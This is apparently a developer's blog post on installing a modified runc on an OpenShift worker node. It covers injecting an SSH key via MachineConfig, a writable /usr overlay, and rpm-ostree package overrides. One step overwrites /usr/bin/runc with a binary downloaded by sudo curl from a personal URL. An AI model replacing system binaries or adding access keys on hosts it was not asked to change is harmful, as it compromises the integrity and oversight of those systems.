<span id="cb4-11"><a href="#cb4-11" aria-hidden="true" tabindex="-1"></a><span class="at">    </span><span class="fu">passwd</span><span class="kw">:</span></span>
<span id="cb4-12"><a href="#cb4-12" aria-hidden="true" tabindex="-1"></a><span class="at">      </span><span class="fu">users</span><span class="kw">:</span></span>
<span id="cb4-13"><a href="#cb4-13" aria-hidden="true" tabindex="-1"></a><span class="at">      </span><span class="kw">-</span><span class="at"> </span><span class="fu">name</span><span class="kw">:</span><span class="at"> core</span></span>
<span id="cb4-14"><a href="#cb4-14" aria-hidden="true" tabindex="-1"></a><span class="at">        </span><span class="fu">sshAuthorizedKeys</span><span class="kw">:</span></span>
<span id="cb4-15"><a href="#cb4-15" aria-hidden="true" tabindex="-1"></a><span class="at">        </span><span class="kw">-</span><span class="at"> ssh-rsa AAAA…40U= root@worker-a</span></span></code></pre></div>
<p>I created the <code>MachineConfig</code>:</p>
<pre class="shell"><code>% oc create -f machineconfig-ssh-worker.yaml
machineconfig.machineconfiguration.openshift.io/ssh-authorized-keys created</code></pre>
<p>In the node debug shell, I observed that Machine Config Operator
applied the change after a few seconds. It did not restart the
worker node. My key was added alongside a key defined in some other
<code>MachineConfig</code>.</p>
<pre class="shell"><code>sh-4.4# cat /var/home/core/.ssh/authorized_keys
ssh-rsa AAAA…jjNV devenv

ssh-rsa AAAA…4OU= root@worker-a</code></pre>
<p>Now I could log in over SSH:</p>
<pre class="shell"><code>sh-4.4# ssh core@$(hostname)
The authenticity of host &#39;worker-a (10.0.128.2)&#39; can&#39;t be established.
ECDSA key fingerprint is SHA256:LUaZOleqVFunmLCp4/E1naIQ+E5BpmVp0gcsXHGacPE.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added &#39;worker-a,10.0.128.2&#39; (ECDSA) to the list of known hosts.
Red Hat Enterprise Linux CoreOS 48.84.202106231817-0
  Part of OpenShift 4.8, RHCOS is a Kubernetes native operating system
  managed by the Machine Config Operator (`clusteroperator/machine-config`).

WARNING: Direct SSH access to machines is not recommended; instead,
make configuration changes via `machineconfig` objects:
  https://docs.openshift.com/container-platform/4.8/architecture/architecture-rhcos.html

---
[core@worker-a ~]$</code></pre>
<p>The user is unconfined and I can see the normal, read-only (<code>ro</code>)
<code>/usr</code> mount (but no overlay):</p>
<pre class="shell"><code>[core@worker-a ~]$ id -Z
unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
[core@worker-a ~]$ mount |grep &quot;on /usr&quot;
/dev/sda4 on /usr type xfs (ro,relatime,seclabel,attr2,inode64,logbufs=8,logbsize=32k,prjquota)
overlay on /usr type overlay (rw,relatime,seclabel,lowerdir=usr,upperdir=/var/tmp/ostree-unlock-ovl.KZ4V50/upper,workdir=/var/tmp/ostree-unlock-ovl.KZ4V50/work)</code></pre>
<p>I executed <code>rpm-ostree usroverlay</code> via <code>sudo</code>. After that, a
read-write (<code>rw</code>) overlay filesystem is visible:</p>
<pre class="shell"><code>[core@worker-a ~]$ sudo rpm-ostree usroverlay
Development mode enabled.  A writable overlayfs is now mounted on /usr.
All changes there will be discarded on reboot.
[core@worker-a ~]$ mount |grep &quot;on /usr&quot;
/dev/sda4 on /usr type xfs (ro,relatime,seclabel,attr2,inode64,logbufs=8,logbsize=32k,prjquota)
overlay on /usr type overlay (rw,relatime,seclabel,lowerdir=usr,upperdir=/var/tmp/ostree-unlock-ovl.TCPM50/upper,workdir=/var/tmp/ostree-unlock-ovl.TCPM50/work)</code></pre>
<p>And it is indeed writable. I made a copy of the original <code>runc</code>
binary, then installed my modified version:</p>
<pre class="shell"><code>[core@worker-a ~]$ sudo cp /usr/bin/runc /usr/bin/runc.orig
[core@worker-a ~]$ sudo curl -Ss -o /usr/bin/runc \
    https://ftweedal.fedorapeople.org/runc</code></pre>
<h2 id="digression-use-a-buildroot">Digression: use a buildroot <a href="#digression-use-a-buildroot" class="section">§</a></h2>
<p>The <code>runc</code> executable I installed on the previous step didn’t work.
I had built it on my workstation, against a too-new version of
<em>glibc</em>. The OpenShift node (which was running RHCOS 4.8, based on
RHEL 8.4) was unable to link <code>runc</code>. Therefore it could not run
<em>any</em> container workloads. I was able to SSH in from another node
and reboot, discarding the transient change in the <code>usroverlay</code> and
restoring the node to a functional state.</p>
<p>All of this is obvious in hindsight. You have to build the program
for the environment in which it will be executed. In my case, it
was easiest to do this via Brew or Koji. I cloned the dist-git
repository (via the <code>fedpkg</code> or <code>rhpkg</code> tool), created patches and
updated the <code>runc.spec</code> file. Then I built the SRPM (<code>.src.rpm</code>)
and started a scratch build in Brew. After the build completed I
made the resulting <code>.rpm</code> publicly available, so that it can be
fetched from the OpenShift cluster.</p>
<h2 id="override-replace-via-node-debug-container"><code>override replace</code> via node debug container <a href="#override-replace-via-node-debug-container" class="section">§</a></h2>
<p>I now have my modified <code>runc</code> in an RPM package. So I can use
<code>rpm-ostree override replace</code> to install it. In a debug node on the
host:</p>
<pre class="shell"><code>sh-4.4# rpm-ostree override replace \
  https://ftweedal.fedorapeople.org/runc-1.0.0-98.rhaos4.8.gitcd80260.el8.x86_64.rpm
Downloading &#39;https://ftweedal.fedorapeople.org/runc-1.0.0-98.rhaos4.8.gitcd80260.el8.x86_64.rpm&#39;... done!
Checking out tree eb6dd3b... done
No enabled rpm-md repositories.
Importing rpm-md... done
Resolving dependencies... done
Applying 1 override
Processing packages... done
Running pre scripts... done
Running post scripts... done
Running posttrans scripts... done
Writing rpmdb... done
Writing OSTree commit... done
Staging deployment... done
Upgraded:
  runc 1.0.0-97.rhaos4.8.gitcd80260.el8 -&gt; 1.0.0-98.rhaos4.8.gitcd80260.el8
Run &quot;systemctl reboot&quot; to start a reboot</code></pre>
<p><code>rpm-ostree</code> downloaded the package and prepared the updated OS.
Per the advice, the update is not active yet; I need to reboot:</p>
<pre class="shell"><code>sh-4.4# rpm -q runc
runc-1.0.0-97.rhaos4.8.gitcd80260.el8.x86_64
sh-4.4# systemctl reboot
sh-4.4# exit
sh-4.2# 
Removing debug pod ...</code></pre>
<p>After reboot I started a node debug container and verified that the
modified version of <code>runc</code> is visible:</p>
<pre class="shell"><code>% oc debug node/worker-a
Starting pod/worker-a-debug ...
To use host binaries, run `chroot /host`
Pod IP: 10.0.128.2
If you don&#39;t see a command prompt, try pressing enter.
sh-4.2# chroot /host
sh-4.4# rpm -q runc
runc-1.0.0-98.rhaos4.8.gitcd80260.el8.x86_64</code></pre>
<p>And the fact that the debug container is working proves that the
modified version of runc isn’t <em>completely</em> broken! Testing the new
functionality is a topic for a different post, so I’ll leave it at
that.</p>
<h3 id="listing-and-resetting-overrides">Listing and resetting overrides <a href="#listing-and-resetting-overrides" class="section">§</a></h3>
<p><code>rpm-ostree status --booted</code> lists the current base image and any
overrides that have been applied:</p>
<pre class="shell"><code>sh-4.4# rpm-ostree status --booted
State: idle
BootedDeployment:
* pivot://quay.io/openshift-release-dev/ocp-v4.0-art-dev@sha256:9a23adde268dc8937ae293594f58fc4039b574210f320ebdac85a50ef40220dd
              CustomOrigin: Managed by machine-config-operator
                   Version: 48.84.202106231817-0 (2021-06-23T18:21:06Z)
      ReplacedBasePackages: runc 1.0.0-97.rhaos4.8.gitcd80260.el8 -&gt; 1.0.0-98.rhaos4.8.gitcd80260.el8</code></pre>
<p>To reset an override for a specific package, run <code>rpm-ostree override reset $PKG</code>:</p>
<pre class="shell"><code>sh-4.4# rpm-ostree override reset runc
Staging deployment... done
Freed: 1.1 GB (pkgcache branches: 0)
Downgraded:
  runc 1.0.0-98.rhaos4.8.gitcd80260.el8 -&gt; 1.0.0-97.rhaos4.8.gitcd80260.el8
Run &quot;systemctl reboot&quot; to start a reboot</code></pre>
<p>To reset <em>all</em> overrides, execute <code>rpm-ostree reset</code>:</p>
<pre class="shell"><code>sh-4.4# rpm-ostree reset
Staging deployment... done
Freed: 54.8 MB (pkgcache branches: 0)
Downgraded:
  runc 1.0.0-98.rhaos4.8.gitcd80260.el8 -&gt; 1.0.0-97.rhaos4.8.gitcd80260.el8
Run &quot;systemctl reboot&quot; to start a reboot</code></pre>
<h2 id="discussion">Discussion <a href="#discussion" class="section">§</a></h2>
<p>I achieved my goal of installed a modified <code>runc</code> executable on an
OpenShift node. There were two approaches:</p>
<ol type="1">
<li><p><code>rpm-ostree usroverlay</code> creates a writable overlay on <code>/usr</code>.
The overlay disappears at reboot, which is fine for my testing
needs. This technique doesn’t work from a node debug container;
you have to log in over SSH, which requires additional steps to
add SSH keys.</p></li>
<li><p><code>rpm-ostree override replace</code> overrides a particular package RPM.
The change takes effect after reboot and is persistent. It is
easy to rollback or reset the override. This technique does not
require SSH login; it works fine in a node debug container.</p></li>
</ol>
<p>Because I needed to build my package in a RHEL 8.4 / RHCOS 4.8
buildroot, I used Brew. The build artifacts are RPMs. Therefore
<code>rpm-ostree override replace</code> is the most convenient option for me.</p>
<p>Both options apply changes <em>per-node</em>. After confirming with CoreOS
developers, there is currently no way to roll out a package override
cluster-wide or to a defined group of nodes (e.g. to
<code>MachineConfigPool/worker</code> via a <code>MachineConfig</code>). So for now, you
either have to apply changes/overrides on specific nodes, or build
the whole <code>machine-os-content</code> image and upgrade the cluster. As a
container runtime developer, my sweet spot is in a gulf between the
existing options. I can tolerate this mild annoyance on the
assumption that it discourages messing around in production
environments.</p>
<p>In the meantime, now that I have worked out how to install my
modified <code>runc</code> onto worker nodes, I will get on with testing it!</p>]]></summary>
</entry>

</feed>
